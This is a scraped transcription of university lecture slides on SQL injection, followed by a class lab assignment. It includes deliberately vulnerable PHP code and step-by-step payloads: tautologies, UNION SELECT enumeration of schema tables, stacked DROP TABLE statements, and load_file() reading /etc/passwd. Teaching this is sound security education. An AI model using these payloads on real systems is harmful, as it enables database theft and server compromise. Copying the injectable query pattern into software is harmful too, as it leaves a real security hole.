Daniel Pittman October 17, 2011

Similar documents
Web Security. Attacks on Servers 11/6/2017 1

A1 (Part 2): Injection SQL Injection

SQL Injection SPRING 2018: GANG WANG

PHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008.

Application vulnerabilities and defences

Understanding Basic SQL Injection

COMP519: Web Programming Autumn 2015

WEB SECURITY p.1

IS 2150 / TEL 2810 Introduction to Security

Lecture 13: MySQL and PHP. Monday, March 26, 2018

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

ITS331 IT Laboratory I: (Laboratory #11) Session Handling

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

A QUICK GUIDE TO PROGRAMMING FOR THE WEB. ssh (then type your UBIT password when prompted)

NET 311 INFORMATION SECURITY

SQL Injection Attack Lab

Blind Sql Injection with Regular Expressions Attack

Tutorial on SQL Injection

CSCE 548 Building Secure Software SQL Injection Attack

CSE 127 Computer Security

Some Facts Web 2.0/Ajax Security

A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks

CSC 405 Computer Security. Web Security

Automated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation

CSE 565 Computer Security Fall 2018

Networks and Web for Health Informatics (HINF 6220) Tutorial 13 : PHP 29 Oct 2015

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Database Connectivity using PHP Some Points to Remember:

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Server-side web security (part 2 - attacks and defences)

The Target Intranet. SQL Injection

Welcome to Bradford Online School Admissions

COM1004 Web and Internet Technology

; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc. magic_quotes_runtime = Off

CSC 564: SQL Injection Attack Programming Project

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Solution of Exercise Sheet 5

Fundamentals of Web Programming

Chapters 10 & 11 PHP AND MYSQL

Hello everyone! Page 1. Your folder should look like this. To start with Run your XAMPP app and start your Apache and MySQL.

Computer Security Coursework Exercise CW1 Web Server and Application Security

Injection. CSC 482/582: Computer Security Slide #1

LAMP Apps. Overview. Learning Outcomes: At the completion of the lab you should be able to:

Jackson State University Department of Computer Science CSC / Advanced Information Security Spring 2013 Lab Project # 3

Lecture 6 Session Control and User Authentication. INLS 760 Web Databases Spring 2013 Rob Capra

Barracuda Web Application Firewall Foundation - WAF01. Lab Guide

Secure Programming. Input Validation. Learning objectives Code Injection: Outline. 4 Code Injection

Web Security: Vulnerabilities & Attacks

Tyler Identity User Account Management New World ERP Foundation

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

John Coggeshall Copyright 2006, Zend Technologies Inc.

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

3. Apache Server Vulnerability Identification and Analysis

PHP: Databases and Classes. CS174. Chris Pollett. Sep 29, 2008.

CS 161 Computer Security

PHP Development - Introduction

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

By the end of this section of the practical, the students should be able to:

CSCI-UA: Database Design & Web Implementation. Professor Evan Sandhaus

Locate your Advanced Tools and Applications

Web Application Development (WAD) V th Sem BBAITM(Unit-1) By: Binit Patel

Database Security: Transactions, Access Control, and SQL Injection

Executing Simple Queries

Secure Programming Lecture 8++: SQL Injection

Mysql Tutorial Show Table Like Name Not >>>CLICK HERE<<<

HelpAndManual_illegal_keygen Contactor Elite Autoresponder Installation Guide

WebGoat Lab session overview

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Web Programming. Dr Walid M. Aly. Lecture 10 PHP. lec10. Web Programming CS433/CS614 22:32. Dr Walid M. Aly

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

CS1 Lecture 3 Jan. 22, 2018

SQL Injection. A tutorial based on XVWA

Drop Table If Exists Sql Command Not Properly Ended

Information Security Training. Assignment 3 Web Application Security

Lab 7 Introduction to MySQL

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

CS108 Lecture 19: The Python DBAPI

Web Attacks Lab. 35 Points Group Lab Due Date: Lesson 16

Side-channel attacks (and blind SQL injections)

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

Web Application Security. Philippe Bogaerts

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:


CONTROL Installation and Basic-configuration Guide Contents

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

Activity 1.1: Indexed Arrays in PHP

Client-Side Detection of SQL Injection Attack

4.6.5 Data Sync User Manual.

Sysco Market Login Help

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

Setup of PostgreSQL, pgadmin and importing data. CS3200 Database design (sp18 s2) Version 2/9/2018

Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson)

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

CS 161 Computer Security

This lab will introduce you to MySQL. Begin by logging into the class web server via SSH Secure Shell Client

CS1 Lecture 3 Jan. 18, 2019

IELM 511 Information Systems Design Labs 5 and 6. DB creation and Population

MyClinic. Password Reset Guide

Sql Server Check If Index Exists Information_schema >>>CLICK HERE<<<

Transcription:

Daniel Pittman October 17, 2011

SELECT target-list FROM relation-list WHERE qualification target-list A list of attributes of relations in relation-list relation-list A list of relation names qualification Comparisons (<, >, =,,, 6=, AND, OR, NOT, etc)

SELECT U.user_name FROM Users U, Admins A WHERE A.user_name = U.uid AND U.first_name LIKE %Bob% ; INSERT INTO USERS (uid, user_name, first_name) VALUES (1234, chris, Chris ); DELETE FROM Users WHERE first_name LIKE '%Bob%'; DROP TABLE USERS;

A UNION can be used to compute the union of any two union-compatible sets Think of a UNION like an OR SELECT U.user_name FROM Users U, Admins A WHERE A.user_name = U.uid AND U.first_name LIKE %Bob% ; UNION SELECT U.user_name FROM Users U, Admins A WHERE A.user_name = U.uid AND U.first_name LIKE %Jim% ;

<form action="injection.php" method="post"> Want to sign up for our weekly newsletter? Enter your email address below:<br><br> Email: <input type="text" name="email_newsletter" size="80"><br><br> <input type="submit" name="sqlite_signup" value="sqlite" onclick="this.form.action='sqlite.php';"><br><br> Forgot your password? Enter your email address below:<br><br> Email: <input type="text" name="email" size="80"><br><br> <input type="submit" name="sqlite" value="sqlite" onclick="this.form.action='sqlite.php';"> <input type="submit" name="mysql" value="mysql" onclick="this.form.action='mysql.php';"> When pushing any of the submit buttons the information is posted" to one of the PHP scripts on the server.

PHP queries the database Parses what is returned from the query Formats information for the user Presents the information to the user This is a common point of attack for a malicious user One mistake or overlooked detail in the entire implementation can allow for the server to be compromised

{ if ($_POST['mysql']) $query = "SELECT * FROM members WHERE email = '". $email. "';"; $result = mysql_query($query); $num_rows = mysql_num_rows($result); if ($num_rows!= 0) { $row = mysql_fetch_assoc($result); echo "Your login credentials have been sent to: <br>"; echo $row['email']; } else { echo "Your email address is not listed with us."; } }

if ($_POST['sqlite']) { $email=$_post['email']; $sql = "SELECT email FROM members WHERE email = '". $email. "'"; $res = sqlite_query($db, $sql); if (sqlite_num_rows($res)!= 0) { $row = sqlite_fetch_array($res); echo "Your login credentials have been sent to: <br>"; echo $row['email']; } else { echo "Your email address is not listed with us."; } }

else { $email=$_post['email_newsletter']; $sql = "SELECT email FROM newsletter WHERE email = '". $email. "'"; $res = sqlite_query($db, $sql); if (sqlite_num_rows($res)!= 0) { $row = sqlite_fetch_array($res); echo "Your email already exists: <br>"; echo $row['email']; } else { if(sqlite_exec($db, "insert into newsletter values ('". $email. "')")) { echo "Email added.<br>"; } } }

Attacker has no knowledge of back end applications, source code, security implementations Traditional page with signup for newsletter and forgotten password prompt for members GOAL: Discover information about the underlying database, server and user information. NOTE: These demonstrations are using up to date software, not old vulnerable implementations.

With knowledge of SQL the attacker can guess that the underlying SQL code looks something like: SELECT fieldlist FROM table WHERE field = '$EMAIL'; $EMAIL is the variable that the user inputs into the form, expected to be an innocent email address

The web application may construct the SQL string literally We can check to see if input is sanitized by adding an extra single quote and some noise. SELECT fieldlist FROM table WHERE field = test@test.com abc'; SQL parser finds the extra quote and aborts due to a syntax error This error response usually means input sanitization is not being done or is being done incorrectly Exploitation should be possible

See what information we can find out about the database Enter legal SQL code and see what happens SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x'; 'x'='x' is guaranteed to be true no matter what, our query should succeed. Observer what happens when the query is executed Most likely this is the first record returned

What did the database creator name the different fields? Guess common names such as email, first name, password SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; -- '; The -- is a SQL comment so the closing quote and semicolon will be ignored If output is an error message, then it is likely email is not a field name If output is a success message, it is likely to be a field name Continue guessing field names

After step 3 the attacker knows the fieldnames to be email, passwd, login id, full name There are also several approaches to this, we examine one in particular here and one later SELECT email, passwd, login_id, full_name FROM table WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); -- '; Where tablename is the guess at what a table name is We do not care how many records, only if the name is valid

A UNION will allow us to add another query to the original which gives a work around to MySQL limiting the amount of queries. As we know, UNION queries must return the same number of arguments. If we had not figured it out from earlier steps it is pretty trivial Attempt with different numbers of arguments SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT 1,2,3,4; -- ';

Can we get table name? MySQL/SQLite keep records of tables Need to walk through them one by one, we can use LIMIT SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT table_name FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1; -- '; SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT name FROM sqlite_master WHERE type='table' ORDER BY name limit 0,1 -- ';

Now we know the table name, we can use this to narrow our queries down to only the information we are interested in SELECT fieldlist FROM table WHERE field = 'x' UNION SELECT group concat(column name),2,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'members' LIMIT 0,10; -- '; SELECT fieldlist FROM table WHERE field = 'x' union SELECT sql FROM sqlite_master where name = 'members ';

Most SQL libraries will NOT execute multiple SQL commands at once during a query There are still avenues for exploit, however sqlite_exec If multiple statements can be executed, you can: DROP a table: x ; DROP TABLE members - CREATE a table: x ; CREATE TABLE foo (name(varchar(50)) -- INSERT data: x INSERT INTO members values ( test ) --

Another included MySQL command, load_file() How dangerous could that be? This function can be used to extract and view files on the server file system We need to encode the ascii as hexidecimal because of quote filtration by the function. Easily done using xxd or hexdump echo /etc/passwd hexdump C 2f 65 74 63 2f 70 61 73 73 77 64 0a Lets try to view /etc/passwd SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' UNION SELECT load_file(0x2f6574632f706173737764); -- ';

SQL databases are used everywhere on the Internet If the public interfaces to the databases are insecure, the entire database is insecure and possibly the server! Very important to follow proper procedures for designing and implementing databases Test attacks against your own implementations

Web Applications Security: SQL Injection Attack http://class.ece.iastate.edu/kothari/cpre556/lectures/ W4/Lecture%207- SQL%20Injection%20Security%20Vulnerability- January31.pdf Understanding MySQL Union Poisoning http://www.grayscaleresearch.org/new/pdfs/sqlinjectionpresentation.pdf Course slides, Comp3421: Introduction to Database Management Systems http://web.cs.du.edu/~ymayster/comp3421/slides/com P3421Lectures8-10.pdf

Thanks to Chris Neilson for developing the basis for this presentation and the assignment

Field names must match in injected queries SELECT fieldlist FROM table WHERE field = 'x' union SELECT sql as email FROM sqlite_master where name = 'members '; Space after comment - is important Warnings while performing exploit may be OK! Don t think you failed just because you see a warning on the screen

VPN into DU network http://www.du.edu/uts/helpdesk/docs/networking/vpn/windows.html Open browser to http://130.253.190.110:8080/sqlinjection/ In MySQL, there is a table set up for each member of class Table name is CS user name Inside table is random number On the file system, in the /usr/sqlinjection folder, is a file for each member of the class File name is CS user name Inside file is another random number In MySQL, identify the table name and columns that the forgot password link accesses In SQLite, CREATE a table with your CS user name that holds an Integer Insert a random value into that table For each exploit, the EXACT commands typed into the browser, plus the output of the exploit, will be submitted

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback